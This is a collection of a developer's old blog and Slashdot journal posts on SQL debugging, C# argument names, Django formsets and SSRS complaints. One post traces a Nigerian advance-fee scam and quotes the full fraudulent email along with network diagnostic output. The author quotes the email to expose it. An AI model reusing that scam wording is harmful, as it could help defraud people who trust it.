<iframe width="560" height="315" src="https://www.youtube.com/embed/1NoNTqank_U" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
<iframe width="560" height="315" src="https://www.youtube.com/embed/G45hqWNScvE" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
<file_sep>---
title: "Real IT Stories"
date: 2004-08-14
slashdot_url: https://slashdot.org/journal/80312/real-it-stories
---
<p>Not bad for m$ technical <a href="http://www.microsoft.com/technet/abouttn/subscriptions/flash/promo/realstories/topten.mspx">comdey</a></p>
<file_sep>---
layout: post
title: Debugging stored procedures in VS2010 / SQL Express
date: '2012-05-22T16:58:00.000Z'
author: <NAME>
tags:
modified_time: '2014-10-16T17:40:31.093Z'
thumbnail: http://1.bp.blogspot.com/-v43Zoh8QMUc/T7vIRbLcQ1I/AAAAAAAAAFo/465qvN6CYFM/s72-c/debug-t-sql-attach.png
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-2656726104783111677
blogger_orig_url: https://timwise.blogspot.com/2012/05/debugging-stored-procedures-in-vs2010.html
---
Debugging stored procs in a _local_ SQL Express install with Visual Studio
2010.
Enable TCP/IP - see [http://timwise.blogspot.co.uk/2012/05/enabling-tcpip-in-sql-express-2008-r2.html](http://timwise.blogspot.co.uk/2012/05/enabling-tcpip-in-sql-express-2008-r2.html)
In Visual Studio, Server Explorer, Connect to your server as localhost instead
of .\SQLEXPRESS so that you connect through TCP/IP and not shared memory (which
doesn't allow debugging for some reason)
Find the project in your solution which actually executes the stored procedure,
right-click > properties > debug > "Enable SQL Server debugging"
Run your project
You may need to hit "stop" and re-attached (debug > attach to process)
explicitly selecting "T-SQL code" in the "attach to" box (and optionally
managed as well). It *should* automatically select T-SQL but it seems to be hit
and miss.
Set a breakpoint in your stored procedure:
* Server explorer,
* the connection you added,
* stored procs,
* right-click the proc name > open
* set a break point in the text of the stored proc
* if it is not a solid red dot then something went wrong
Run the part of your program / website that will cause the proc to be called.
If the breakpoint isn't hit check the type's in the attach to process list
include T-SQL (doesn't seem to always work).
I only got the damn thing to work once. If it doesn't work you get no reason at
all which is just crap. The main problem I have is that the attach just quietly
drops T-SQL even if you explicitly request it. Shoddy coding from Microsoft in
my opinion.
The next best thing is to right-click the stored proc, click "step into" and
input the values manually. (Which also requires a tcp/ip connection to the
local sql express and is fussy).
Another message encountered a couple of days later without changing anything at
all when attaching to the already running web dev process: "[<span
id="goog_211408035"></span>User Could Not Execute Stored Procedure
sp_enable_sql_debug<span
id="goog_211408036"></span>](http://msdn.microsoft.com/en-us/library/ms241735(v=vs.100).aspx)"
# References
* [http://stackoverflow.com/questions/4737175/the-breakpoint-will-not-currently-be-hit-error-when-trying-to-debug-a-tsql](http://stackoverflow.com/questions/4737175/the-breakpoint-will-not-currently-be-hit-error-when-trying-to-debug-a-tsql)
* [http://social.msdn.microsoft.com/forums/en-US/vstsdb/thread/f5247d99-06f0-4ae3-9371-04c70f750647/](http://social.msdn.microsoft.com/forums/en-US/vstsdb/thread/f5247d99-06f0-4ae3-9371-04c70f750647/)
* [http://support.microsoft.com/kb/316549/en-us](http://support.microsoft.com/kb/316549/en-us)
(from comment below)
# Screenshots





<file_sep>---
title: "i don't do forwards"
date: 2004-12-25
slashdot_url: https://slashdot.org/journal/93877/i-dont-do-forwards
---
<p>... but this is a classic</p>
<p><a href="http://community-2.webtv.net/@HH!3B!01!109A6273ED6D/Babajani1/MurphysLaw/">http://community-2.webtv.net/@HH!3B!01!109A6273ED6D/Babajani1/MurphysLaw/</a></p>
<p>oh, and merry xmas.<nobr> </nobr>:)</p>
<file_sep>---
title: Always Add Argument Names
layout: post
---
An argument (lol) for the use of explicit argument names in C# function calls even when they seem redundant.
1. You can assert correctness when reviewing the call site in a dumb text display (e.g. a patch in a github pull request)
2. Parameter-order refactoring won't introduce subtle bugs and breaking changes.
This is particularly important when you have multiple arguments of the same type.
It's also a good idea when the call doesn't immediately make it obvious what the meaning of the parameter is. E.g. `Foo(3)` vs `Foo(sizeInMeters: 3)`.
## No argument names (bad)
Starting point:
```c#
void Main()
{
Foo("Home", "Blah"); // don't do this
}
void Foo(string importantThing, string otherThing)
{
switch (importantThing)
{
case "Home":
DoSomething();
break;
default:
DoSomethingElse();
break;
}
Log(otherThing);
}
```
If `Foo()` is defined in a different file it's hard to eyeball `Main()` and tell if the arguments line up properly.
If I now re-order the arguments of `Foo()` can you easily spot that the call site in `Main()` is now incorrect?
```c#
void Main()
{
Foo("Home", "Blah"); // Now broken!! But can you tell?
}
void Foo(string otherThing, string importantThing) // <-- parameters flipped
{
switch (importantThing)
{
case "Home":
DoSomething();
break;
default:
DoSomethingElse();
break;
}
Log(otherThing);
}
```
## With argument names (good)
Starting point:
```c#
void Main()
{
Foo(importantThing: "Home", otherThing: "Blah");
}
void Foo(string importantThing, string otherThing)
{
switch (importantThing)
{
case "Home":
DoSomething();
break;
default:
DoSomethingElse();
break;
}
Log(otherThing);
}
```
You can now easily see that `"Home"` is going to `"importantThing"`, even in a plain-text view of the file.
If I now re-order the arguments of `Foo()` again, it *doesn't* break because the compiler knows which string to connect to which parameter. Win.
```c#
void Main()
{
Foo(importantThing: "Home", otherThing: "Blah"); // still valid!
}
void Foo(string otherThing, string importantThing) // <-- refactored
{
switch (importantThing)
{
case "Home":
DoSomething();
break;
default:
DoSomethingElse();
break;
}
Log(otherThing);
}
```
<file_sep>---
title: "Nigerian Scam"
date: 2003-11-29
slashdot_url: https://slashdot.org/journal/53554/nigerian-scam
---
<p>Edit: Apparently indiatimes is genuine. (sorry! India Times) must've been just a webmail account. Couldn't see half the site from home. Oh well. Maybe this isn't so exciting then. -4/12/03<br>------------------------------------------</p>
<p>Thought I'd do some detective work today.<br>This is a bit of an obtuse one, but here goes anyway.</p>
<p>I received a copy of the negeria scam via email (Appendix 1).</p>
<p>Facts:</p>
<p>source IP address: 172.16.17.32<br>spam sourced using a <a href="http://www.nyc.com/">http://www.nyc.com/</a> mail account<br>reply address 1: <EMAIL><br>reply address 2: <EMAIL></p>
<p>Analysis:</p>
<p>Interesting trace, the source IP Address is owned by SKY2Net ltd. (GILAT-SATCOM-BLOCK-31-32-40-46)<br>Are the spammers using satellite technology to avoid being tracked down?</p>
<p>I had a look at nyc.com and it appears to have a valid web-mail service<br><a href="https://nyc-mail.nyc.com/cgi-bin/signup/signup.pl">https://nyc-mail.nyc.com/cgi-bin/signup/signup.pl</a><br>Think I sent them a mail to their abuse section.</p>
<p>Go.com is valid and provides a web based email service which can be gained online<br><a href="https://register.go.com/go/register">https://register.go.com/go/register</a></p>
<p>I looked at <a href="http://www.indiatimes.com/">http://www.indiatimes.com/</a><br>There's a reasonably convincing first page (plenty of adverts - if we can't be conned then I suppose a bit of advertising kick-back will do!), however you can't get many other pages and the "site" quickly looks flaky. I reckon this was set up by the spammers to convince people the address was valid.<br>The site seems to exists on multiple IP addresses. See: <a href="http://uptime.netcraft.com/up/graph?site=www.indiatimes.com">http://uptime.netcraft.com/up/graph?site=www.indiatimes.com</a> where all the IP addresses seem to be listed. Which address you get changes regularly (minutes apart) - see Appendix 6<br>Appendix 3 contains one of the traces, which finishes with an unreachable domain name. Very odd.</p>
<p>looking up the MX records reveals the mail server to be smtp.indiatimes.com (Appendix 4)</p>
<p>smtp.indiatimes.com (192.168.3.11) seems to work but is hosted somewhere else, couldn't get any useful info out of tracert or ripe.net. (Appendices 2 and 5)</p>
<p>Conclusions?<br>None<br>I hate people who exploit other people. Through whatever means & medium.</p>
<p><b> <i>Appendices:</i> </b><br><b>1) The received email (with headers)</b></p>
<p>From: - Tue Nov 25 07:46:47 2003<br>X-UIDL: <1618.192.116.66.219.1069698616.<EMAIL>><br>X-Mozilla-Status: 1001<br>X-Mozilla-Status2: 00000000<br>Return-Path: <<EMAIL>><br>Received: from nyc-mail.nyc.com ([66.111.12.66]) by mta6-svc.business.ntl.com (InterMail vM.4.01.03.37<br>201-229-121-137-20020806) with SMTP id <20031124183749.KMRS21828.m<EMAIL>> for<br><<EMAIL>>; Mon, 24 Nov 2003 18:37:49 +0000<br>Received: (qmail 45052 invoked by uid 79); 24 Nov 2003 18:30:17 -0000<br>Received: from 172.16.17.32 (NYC.com Mail authenticated user <EMAIL>) by mail-nyc.nyc.com with HTTP; Tue, 25<br>Nov 2003 02:30:16 +0800 (SGT)<br>Message-ID: <1618.172.16.17.32.106969861<EMAIL>><br>Date: Tue, 25 Nov 2003 02:30:16 +0800 (SGT)<br>Subject: REPLY URGENTLY<br>From: Muhammed <<EMAIL>><br>To: <EMAIL><br>User-Agent: NYC.com Mail/1.4.2<br>MIME-Version: 1.0<br>Content-Type: text/plain;charset=iso-8859-1<br>Content-Transfer-Encoding: 8bit</p>
<p>VERY URGENT AND STRICTLY CONFIDENTIAL BUSINESS PROPOSAL.</p>
<p>PLEASE I WANT YOU TO RELPY ME THIS MAIL TO MY ALTERNATIVE EMAIL ADDRESSES<br><EMAIL> and <EMAIL></p>
<p>Dear Sir,</p>
<p>I am <NAME> the son of the late Gen. <NAME>, former head<br>of State of Nigeria who died on 8th June 1998 while in office. Since the<br>death of my father the present Government of Chief Olusegun Obasanjo has<br>been tormenting members of the Abachas family including family friends.<br>All businesses and property owned by the Abachas have been confiscated by<br>the Government and all our Bank Account in Nigeria and abroad have been<br>frozen. A quick reference of Newsweek publication of March 13th 1999 were<br>88million dollars was taken from us will give you an insight of what I<br>have gone through. After a short while I was arrested and detained in<br>prison custody, the government came up with a trump up charge against me<br>and honestly speaking I have been in detention since November 1999 and I<br>was only released on Thursdays (11-07-02) by the supreme court of Nigeria<br>who passed judgment in my favor.</p>
<p>During the reign of my father as the president of this country, an<br>Aluminum Smelter Company of Nigeria (Alscom) contract was revealed. The<br>contract was for the construction of plant, at Ikuta Abasi in Akwa Ibom<br>State of Nigeria, for production of ingots and billets required as raw<br>material for Aluminum and Allied Industries, Reynolds Incorporated of<br>America, Phoenix and M&F Companies of Switzerland conducted the<br>feasibility studies. The contract was awarded to Ferrostall AG of Germany.<br>However, after the revaluation of the contract, Ferrostall AG collected<br>its own share of the increment in project cost, while my father's share of<br>fifty-eight Million U.S. Dollars (US$58,000,000:00) was deposited on my<br>name with a security company here in Nigeria for safety keep and I know<br>that my father was planning of how to send this money abroad before his<br>sudden death in June 8 1998. Since then the money has been with the<br>security company up till date. This US$58M was secretly packaged in a<br>trunk box and the certificate of deposit where on my name and is still in<br>my possession.</p>
<p>Hence all plane is to ship this money abroad through a diplomatic means<br>without the knowledge of anybody from outside knowing my involvement in<br>this money, to avoid be seized due to my presently situation and also I am<br>handicapped as what next to do since I am not conversant with<br>international monitory policies. Hence I am contacting you as a reputable<br>and trustworthy person, with a well experience and able hand to help. This<br>was to bit the security system in Nigeria Because I want you to claim the<br>money on my behalf. I have declared to the security company that the<br>consignment belongs to (YOU) as my foreign business partners. Actually I<br>got your contact from a reliable source, and also I believe you are in a<br>good position to assist me to transfer this fund for good investment.</p>
<p>Upon receipt of your willingness to assist me claim this money I will then<br>contact my personal attorney to draft a power of attorney that will<br>authorize you as the beneficially of this money so that you can handle<br>this transaction on my behalf. And as soon as this money leaves Nigeria I<br>will travel out to seek asylum either in Europe or America. My contract<br>with APEX FINANCE AND SECURITIES GROUP remains few weeks to expire and I<br>am down broke to renew the duration with the Security Company.</p>
<p>As a matter of urgency, I will like you to send to me immediately your<br>telephone and fax number. I shall send you all the clearance documents by<br>fax. I will then forward your name as the beneficiary and my foreign<br>business partner to the Security Company. You will be entitled to 20% of<br>the total sum involved for your assistance, 5% will be set aside for<br>reimbursement to you for any incidental expenses that may be incurred in<br>the course of the transaction. Your URGENT response is needed. I want you<br>to call my Attorney Mr. <NAME> on 234 1 7765468 for more detailed<br>directives information and the nest required step of how we have to make<br>move immediately as i have told him about you and he is to handle all the<br>processing with you on my behalf. All your REPLY must go through these<br>our family private email address: <EMAIL> and<br><EMAIL> , I will also need your private and direct<br>telephone and fax number for easy reach.</p>
<p>Please this is a very confidential matter, you don't disclose to anybody<br>for us to have success.</p>
<p>Best regard</p>
<p><NAME></p>
<p><b>2) The smtp server ehlo</b></p>
<p>telnet smtp.indiatimes.com 25</p>
<p>ehlo me<br>220 Sat, ESMTP 29 Nov 2003 19:49:07 +0530<br>250-localhost.localdomain Hello 81-86-251-237.dsl.pipex.com [172.16.17.32], pleased to meet you<br>250-8BITMIME<br>250-SIZE<br>250-DSN<br>250-ONEX<br>250-ETRN<br>250-XUSR<br>250 HELP</p>
<p><b>3) A trace route to www.indiatimes.com (one of a varying set)</b></p>
<p>C:\>tracert www.indiatimes.com</p>
<p>Tracing route to indiatime.speedera.net [172.16.31.10]<br>over a maximum of 30 hops:</p>
<p>
1 21 ms <10 ms 10 ms my.router [1192.168.127.12]<br>
2 20 ms 20 ms 10 ms 81-86-240-1.dsl.pipex.com [192.168.127.12]<br>
3 * * * Request timed out.<br>
4 20 ms 20 ms 20 ms POS4-0.GW1.LND9.ALTER.NET [172.16.31.10]<br>
5 20 ms 20 ms 20 ms so-3-0-0.xr1.lnd9.alter.net [192.168.127.12]<br>
6 20 ms 20 ms 20 ms so-0-1-0.TR1.LND9.ALTER.NET [172.16.17.32]<br>
7 20 ms 20 ms 20 ms POS1-0.BR1.LND9.ALTER.NET [172.16.17.32]<br>
8 20 ms 20 ms 20 ms 172.16.58.310<br>
9 10 ms 10 ms 20 ms ge-7-0.ipcolo1.London1.Level3.net [2172.16.31.1031]<br>
10 20 ms 20 ms 20 ms 172.16.58.3<br>
11 20 ms 20 ms 30 ms www.crone-corkhill.co.uk [195.50.97.131]</p>
<p>Trace complete.</p>
<p><b>4) mx nslookup of indiatimes.com</b></p>
<p>C:\>nslookup<br>Default Server: cache0005.ns.eu.uu.net<br>Address: 172.16.17.32</p>
<p>> set type=mx<br>> indiatimes.com<br>Server: cache0005.ns.eu.uu.net<br>Address: 172.16.17.32</p>
<p>Non-authoritative answer:<br>indiatimes.com MX preference = 5, mail exchanger = smtp.indiatimes.com</p>
<p>indiatimes.com nameserver = timesgate2.toi.co.in<br>indiatimes.com nameserver = ulka.timesgroup.com<br>indiatimes.com nameserver = ethome.dhakdhak.com<br>indiatimes.com nameserver = timesgate.toi.co.in<br>timesgate2.toi.co.in internet address = 192.168.3.11<br>ulka.timesgroup.com internet address = 172.16.58.3<br>ethome.dhakdhak.com internet address = 172.16.58.3<br>timesgate.toi.co.in internet address = 172.16.58.3<br>></p>
<p><b>5) Trace to smtp.indiatimes.com server</b></p>
<p>C:\>tracert smtp.indiatimes.com</p>
<p>Tracing route to smtp.indiatimes.com [203.199.93.5]<br>over a maximum of 30 hops:</p>
<p>
1 20 ms <10 ms <10 ms my.router [192.168.1.1]<br>
2 10 ms 20 ms 20 ms 81-86-240-1.dsl.pipex.com [81.86.240.1]<br>
3 * * * Request timed out.<br>
4 20 ms 30 ms 20 ms POS5-0.GW2.LND9.ALTER.NET [146.188.56.101]<br>
5 20 ms 20 ms 21 ms so-4-0-0.xr1.lnd9.alter.net [172.16.31.10]<br>
6 * 20 ms 30 ms so-0-1-0.TR1.LND9.ALTER.NET [146.188.15.33]<br>
7 101 ms 100 ms 90 ms so-6-0-0.IR1.NYC12.ALTER.NET [146.188.15.50]<br>
8 100 ms 91 ms 100 ms 0.so-0-0-0.IL1.NYC9.ALTER.NET [192.168.3.11]<br>
9 100 ms 90 ms 90 ms 0.so-3-0-0.TL1.NYC9.ALTER.NET [192.168.3.116]<br>
10 90 ms 100 ms 100 ms 0.so-7-0-0.XL1.NYC4.ALTER.NET [172.16.31.10]<br>
11 101 ms 100 ms 90 ms POS7-1.IG3.NYC4.ALTER.NET [192.168.127.12]<br>
12 350 ms 361 ms 350 ms vsnlnetin-gw.customer.alter.net [172.16.17.32]<br>
13 350 ms * 351 ms LVSB-VSB-stm-3.Bbone.vsnl.net.in [192.168.3.11]<br>
14 350 ms 351 ms 360 ms 172.16.17.32<br>
15 * * * Request timed out.<br>
16 * * * Request timed out.<br>
17 * * * Request timed out.<br>
18 * * * Request timed out.<br>
19 * * * Request timed out.<br>
20 * * * Request timed out.<br>
21 * * * Request timed out.<br>
22 * * * Request timed out.<br>
23 * * * Request timed out.<br>
24 * * * Request timed out.<br>
25 * * * Request timed out.<br>
26 * * * Request timed out.<br>
27 * * * Request timed out.<br>
28 * * * Request timed out.<br>
29 * * * Request timed out.<br>
30 * * * Request timed out.</p>
<p>Trace complete.</p>
<p>C:\></p>
<p><b>6) Repeated pings to www.indiatimes.com</b></p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:03</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [192.168.127.12] with 32 bytes of data:</p>
<p>Reply from 192.168.127.12: bytes=32 time=40ms TTL=55</p>
<p>Ping statistics for 192.168.127.12:<br>
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 40ms, Maximum = 40ms, Average = 40ms</p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:03</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [172.16.17.3232] with 32 bytes of data:</p>
<p>Reply from 192.168.127.12: bytes=32 time=40ms TTL=55</p>
<p>Ping statistics for 192.168.127.12:<br>
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 40ms, Maximum = 40ms, Average = 40ms</p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:03</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [195.50.97.132] with 32 bytes of data:</p>
<p>Reply from 192.168.127.12: bytes=32 time=40ms TTL=55</p>
<p>Ping statistics for 192.168.127.12:<br>
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 40ms, Maximum = 40ms, Average = 40ms</p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:04</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [195.50.97.131] with 32 bytes of data:</p>
<p>Reply from 172.16.31.10: bytes=32 time=40ms TTL=55</p>
<p>Ping statistics for 172.16.31.10:<br>
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 40ms, Maximum = 40ms, Average = 40ms</p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:05</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [195.50.97.131] with 32 bytes of data:</p>
<p>Reply from 172.16.31.10: bytes=32 time=40ms TTL=55</p>
<p>Ping statistics for 172.16.31.10:<br>
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 40ms, Maximum = 40ms, Average = 40ms</p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:05</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [192.168.3.111] with 32 bytes of data:</p>
<p>Reply from 172.16.31.10: bytes=32 time=50ms TTL=55</p>
<p>Ping statistics for 172.16.31.10:<br>
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 50ms, Maximum = 50ms, Average = 50ms</p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:05</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [172.16.31.10] with 32 bytes of data:</p>
<p>Request timed out.</p>
<p>Ping statistics for 172.16.31.10:<br>
Packets: Sent = 1, Received = 0, Lost = 1 (100% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 0ms, Maximum = 0ms, Average = 0ms</p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:07</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [80.15.238.69] with 32 bytes of data:</p>
<p>Reply from 192.168.127.12: bytes=32 time=40ms TTL=56</p>
<p>Ping statistics for 192.168.127.12:<br>
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 40ms, Maximum = 40ms, Average = 40ms</p>
<p>C:\>it</p>
<p>C:\>date<nobr> </nobr>/t<br>Sat 29/11/2003</p>
<p>C:\>time<nobr> </nobr>/t<br>14:10</p>
<p>C:\>ping www.indiatimes.com -n 1</p>
<p>Pinging indiatime.speedera.net [172.16.17.32] with 32 bytes of data:</p>
<p>Reply from 172.16.17.32: bytes=32 time=50ms TTL=56</p>
<p>Ping statistics for 172.16.17.32:<br>
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),<br>Approximate round trip times in milli-seconds:<br>
Minimum = 50ms, Maximum = 50ms, Average = 50ms</p>
<p>C:\></p>
<p>-end-</p>
<file_sep>---
layout: post
title: javascript dates in firefox and locales
date: '2016-09-27T07:31:00.002Z'
author: <NAME>
tags:
modified_time: '2016-09-28T07:44:06.085Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-1701800026635188050
blogger_orig_url: https://timwise.blogspot.com/2016/09/javascript-dates-in-firefox-and-locales.html
---
Today I learnt:
You actually have to reinstall firefox using a different download to get `new
Date(dateString)` to use a different date format (i.e. non-US).
[https://jqueryvalidation.org/date-method/](https://jqueryvalidation.org/date-method/)
> This method should not be used, since it relies on the `new Date`
> constructor, which behaves very differently across browsers and locales. Use
> `dateISO` instead or one of the locale specific methods (in localizations/
> and additional-methods.js).
So if you're using chocolatey or boxstarter like I am ([my boxstarter
script](https://gist.github.com/timabell/608fb680bfc920f372ac)) you need to add
the locale flag:
[https://chocolatey.org/packages/firefox](https://chocolatey.org/packages/firefox)
`choco install Firefox -packageParameters "l=en-GB"`.
Reinstalling the package with `--force` is sufficient to change it.
It would seem chrome has no way change the format from `en-US`.
To be clear the correct solution is to do as the documentation says and not use
that method, however it's a bit mean having a pitfall like that in the API. And
sometimes you just have to work with the code you have...
<file_sep>---
layout: post
title: Auto-expanding django formset with jQuery
date: '2011-07-07T23:02:00.009Z'
author: <NAME>
tags:
- howto
- dhtml
- django
- code
- jQuery
modified_time: '2011-07-08T23:00:55.354Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-1390054549969590161
blogger_orig_url: https://timwise.blogspot.com/2011/07/auto-expanding-django-formset-with.html
---
As it took me quite a while to get it how I like it, here's the relevant bits for making a django formset (custom markup in a table), that automatically adds rows (formset forms) client-side / in the browser keeping up as you fill in the form.
Do with the code as you wish, no licence needed.
In the view (.html file server side) I have:
@login_required
def invoiceEdit(request, invoice_id):
...
InlineInvoiceItemsFormSet = inlineformset_factory(Invoice, InvoiceItem, form=DeleteIfEmptyModelForm, formset=DeleteIfEmptyInlineFormSet, can_delete=True, extra=10)
...
itemFormSet = InlineInvoiceItemsFormSet()
...
return render_to_response('foo/edit.html', {'invoiceForm': invoiceForm, 'itemFormSet': itemFormSet, 'invoice': invoice}, context_instance=RequestContext(request))
In the template I have:
<script type="text/javascript">
$(function() {
setupInvoiceFormset();
});
var initialRows;
function setupInvoiceFormset() {
initialRows = parseInt($('#id_invoiceitem_set-INITIAL_FORMS').val());
// remove all but last two empty rows
resizeInvoiceFormset();
// add handlers to all inputs to automate row adding
$('.invoiceItemRow :input').blur(resizeInvoiceFormset);
}
const targetExtra = 2; // number of extra rows desired
function resizeInvoiceFormset() {
// count the blank rows at the end
var rows = $('.invoiceItemRow').filter(':not(#templateItemRow)');
var totalRows = rows.length
var blankRows = countBlankRows(rows);
var targetRowCount = totalRows - blankRows + targetExtra;
targetRowCount = Math.max(targetRowCount,initialRows); // don't trim off real rows otherwise delete breaks
if (totalRows > targetRowCount) {
// if there too many blank rows remove the extra rows
rows.slice(targetRowCount).remove(); // negative to strip from ends
} else if (totalRows < targetRowCount) {
// add new blank rows to bring the total up to the desired number
for (var newRowIndex = totalRows; newRowIndex < targetRowCount; newRowIndex++) {
addRow(newRowIndex);
}
} else {
return;
}
// update the hidden form with the new form count
$('#id_invoiceitem_set-TOTAL_FORMS').val(targetRowCount);
}
function countBlankRows(rows) {
// count the empty rows from the bottom up, stopping at the first non-blank row
var blankRows = 0;
for (var i = rows.length -1; i>=0; i--) {
if (isEmptyRow(rows[i])) {
blankRows++;
} else {
break;
}
}
return blankRows;
}
function isEmptyRow(row) {
// loop through all the inputs in the row, return true if they are all blank
// whitespace is ignored
var inputs = $(row).find(':input').filter(':not(:hidden)');
for (var j = 0; j < inputs.length; j++) {
if ($.trim(inputs[j].value).length) {
return false;
}
}
return true;
}
function addRow(newRowIndex) {
var newRow = $('#templateItemRow').clone(true);
newRow.addClass('invoiceItemRow');
newRow.removeAttr('id'); //prevent duplicated template row id
newRow.show();
// replace placeholder with row index
newRow.find(':input').each(function() {
$(this).attr("name", $(this).attr("name").replace('__prefix__', newRowIndex));
$(this).attr("id", $(this).attr("id").replace('__prefix__', newRowIndex));
});
$('.invoiceItemRow:last').after(newRow);
}
</script>
...
{{ itemFormSet.management_form }}
<tr id="templateItemRow" class="invoiceItemRow" style="display: none;">
<td><strong>Item:</strong></td>
<td>
{{ itemFormSet.empty_form.id }}
{{ itemFormSet.empty_form.description }}
{{ itemFormSet.empty_form.description.errors }}</td>
<td class="price">£{{ itemFormSet.empty_form.price }} {{ itemFormSet.empty_form.price.errors }}</td></tr>
{% for item in itemFormSet.forms %}
<tr class="invoiceItemRow">
<td><strong>Item:</strong></td>
<td>
{{ item.id }}
{{ item.description }}
{{ item.description.errors }}</td>
<td class="price">£{{ item.price }} {{ item.price.errors }}</td></tr>
{% endfor %}
...
The result is a form that intuitively shrinks/grows as the content is added/removed.
The javascript is of course actually in a separate .js file.
References:
* [https://docs.djangoproject.com/en/dev/topics/forms/formsets/](https://docs.djangoproject.com/en/dev/topics/forms/formsets/)
* [http://api.jquery.com/](http://api.jquery.com/)
Footnote. You may have noticed the delete-if-empty customisation which I like for usability. References for this at
* [http://pastebin.com/f40a3bde9](http://pastebin.com/f40a3bde9)
* [http://groups.google.com/group/django-users/browse_thread/thread/9e26cf3ab1d1fcb1?tvc=2](http://groups.google.com/group/django-users/browse_thread/thread/9e26cf3ab1d1fcb1?tvc=2)
* [http://groups.google.com/group/django-users/browse_thread/thread/23539f5e085e62b0](http://groups.google.com/group/django-users/browse_thread/thread/23539f5e085e62b0)
<file_sep>---
title: "an evenings work"
date: 2004-07-27
slashdot_url: https://slashdot.org/journal/78638/an-evenings-work
---
<p>late in from work<br>bolognese from scratch<br>guitair<br>sleep<br>hapiness</p>
<file_sep>---
layout: post
title: 100 reasons I hate ssrs
date: '2015-08-12T19:01:00.004Z'
author: <NAME>
tags:
modified_time: '2016-11-15T11:49:21.321Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-875301386032121102
blogger_orig_url: https://timwise.blogspot.com/2015/08/100-reasons-i-hate-ssrs.html
---
*Originally posted at <https://timwise.blogspot.com/2015/08/100-reasons-i-hate-ssrs.html> which attracted some great comments.*
A slightly tongue-in cheek hit-list of nasty things and vague hand-waving
opinions on what makes microsoft's sql server reporting services (ssrs) such a
pig to work with.
I don't really know of anything better so this is mostly just pointless
ranting; but I'll justify it to myself by saying at least you'll know what
you're getting into if you've read this before you start. SSRS seems to be more
"death by one thousand paper cuts" than completely broken, so it's not so easy
to say "it's shit, shalln't use it" like any good prima-donna developer would.
Sorry I mean rock-star (recruiter speak). It also offers a few features that
would be pretty hard to code from hand cost-effectively in something like
asp.net mvc, such as user editing, multiple export formats, scheduled emails,
and some of the ways you can cut-and-shut the data in the reports.
I make no apologies for the colourful language, it's a representation of the
emotional side of having to use this heap of crap.
Some of these were contributed by in the comments (on blogger) after I posted
the original article. (Thanks, that was a nice surprise, and it's nice to know
it's not just me!)
1. [http://www.allenkinsel.com/archive/2013/01/adventures-in-ssrs](http://www.allenkinsel.com/archive/2013/01/adventures-in-ssrs)
1. doesn't bind to a port like a normal fukcing service
1. [http://blogs.devhorizon.com/reza/2008/10/20/say-goodbye-to-iis-say-hello-to-httpsys/](http://blogs.devhorizon.com/reza/2008/10/20/say-goodbye-to-iis-say-hello-to-httpsys/)
1. [http://www.iis.net/learn/get-started/introduction-to-iis/introduction-to-iis-architecture#Hypertext](http://www.iis.net/learn/get-started/introduction-to-iis/introduction-to-iis-architecture#Hypertext)
1. [https://social.technet.microsoft.com/Forums/sqlserver/en-US/f2586aca-78fe-40d6-9bcd-5151bac7136f/role-of-httpsys-in-ssrs-2008-?forum=sqlreportingservices](https://social.technet.microsoft.com/Forums/sqlserver/en-US/f2586aca-78fe-40d6-9bcd-5151bac7136f/role-of-httpsys-in-ssrs-2008-?forum=sqlreportingservices)
